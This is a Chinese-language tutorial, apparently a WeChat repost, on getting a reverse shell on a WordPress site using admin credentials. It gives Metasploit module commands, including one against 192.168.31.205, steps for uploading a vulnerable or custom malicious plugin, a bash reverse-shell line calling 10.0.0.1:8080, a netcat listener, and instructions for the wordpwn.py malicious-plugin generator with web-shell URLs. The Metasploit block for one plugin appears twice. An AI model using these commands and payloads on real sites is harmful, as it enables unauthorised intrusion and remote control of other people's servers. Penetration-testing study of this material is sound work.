此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
要求:
主机:WordPress
攻击机器:Kali Linux
WordPress 凭证:raj: 123(在我们的例子中)
开始吧!!
如您所见,我可以通过 Web 浏览器访问 WordPress 管理控制台。要获取 Web Shell,我们需要利用此 CMS。有多种方法可以利用 WordPress;让我们探索其中的一些操作。
Metasploit框架
第一种方法是使用 Metasploit 框架。此模块需要管理员用户名和密码,登录管理面板,并上传打包为 WordPress 插件的有效负载。由于这是经过验证的代码执行,因此它应该适用于所有版本的 WordPress,从而导致与 Web 服务器建立 Meterpreter 会话。
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit
注入恶意代码
生成 Web 服务器 shell 的另一种技术是注入恶意代码。如果您有管理员的用户名和密码,请登录管理面板并将恶意 PHP 代码注入 index.php 文件(即网站的入口点)。
为此,请导航到 WordPress 仪表板,单击左侧菜单中的“插件”,然后单击“添加新插件”。
安装并激活插件:
单击“立即安装”,然后单击“激活”以在您的 WordPress 网站上启用该插件。
使用文件管理器浏览 WordPress 安装的文件系统。此界面允许您直接查看、上传和编辑文件。
在 WordPress 中,右键单击 index.php 并选择“编辑”。在进行任何更改之前,请创建该文件的副本,以便以后需要时可以恢复它。
将以下代码粘贴到 index.php 文件中,使用 Kali 机器的 IP 和端口号更新 IP 地址。然后单击“保存并关闭”按钮。
接下来,在你的 Kali 机器上打开一个终端并启动 Netcat:
rlwrap nc -lvnp 1234
注入恶意插件
有时,登录用户可能没有修改 WordPress 主题所需的写入权限。在这种情况下,注入恶意 WP 插件是获取 Web Shell 的另一种策略。
一旦你可以访问 WordPress 仪表板,你就可以尝试安装恶意插件。在此示例中,我已经从 Exploit DB 下载了一个易受攻击的插件。
现在我们有了插件的 ZIP 文件,是时候上传它了。
仪表板 > 插件 > 上传插件
在“插件”菜单中,点击“添加新插件”,然后点击“上传插件”。选择你的恶意插件 ZIP 文件,然后点击“立即安装”。
上传后,点击“激活”即可启用该插件。
一旦一切设置正确,您就可以继续利用漏洞了。我们安装了一个名为“reflex-gallery”的易受攻击的插件,众所周知,该插件很容易被利用。
要利用此漏洞,可以使用 Metasploit 框架。加载以下模块并执行提供的命令:
use exploit/unix/webapp/wp_reflexgallery_file_upload
set rhosts 192.168.31.205
set targeturi /wordpress
exploit
上传后,点击“激活”即可启用该插件。
一旦一切设置正确,您就可以继续利用漏洞了。我们安装了一个名为“reflex-gallery”的易受攻击的插件,众所周知,该插件很容易被利用。
要利用此漏洞,可以使用 Metasploit 框架。加载以下模块并执行提供的命令:
use exploit/unix/webapp/wp_reflexgallery_file_upload
set rhosts 192.168.31.205
set targeturi /wordpress
exploit
注入自定义恶意插件
如前所述,我们上传了一个带有易用漏洞的插件。这次,我们将注入自定义生成的恶意插件以获取反向 shell。这个过程很简单:我们将反向 shell 的恶意代码保存在名为“revshell.php”的 PHP 文件中,并将其压缩为 ZIP 文件。
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'")
WetW0rk – 恶意 WordPress 插件
首先,我们需要从GitHub下载恶意的 WordPress 插件。该插件包含利用 WordPress 安装所需的代码。
在 Kali Linux 机器上打开终端并使用以下命令克隆存储库:
git clone https://github.com/wetw0rk/malicious-wordpress-plugin
接下来,我们需要生成恶意插件,将其上传到 WordPress 网站以利用它。
使用克隆存储库中的 wordpwn.py 脚本生成插件。将 <Kali_IP> 替换为您的 Kali 机器的 IP 地址,将 8888 替换为所需的端口号:
python wordpwn.py <Kali_IP> 8888 Y
http://(target)/wp-content/plugins/malicious/wetw0rk_maybe.php
http://(target)/wp-content/plugins/malicious/QwertyRocks.php
http://(target)/wp-content/plugins/malicious/SWebTheme.php?cmd=ls
现在我们已经生成了恶意插件,我们可以继续将其上传到 WordPress 网站来利用它。
像我们之前做的那样上传插件。
原文始发于微信公众号(三沐数安):WordPress:反向 Shell
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论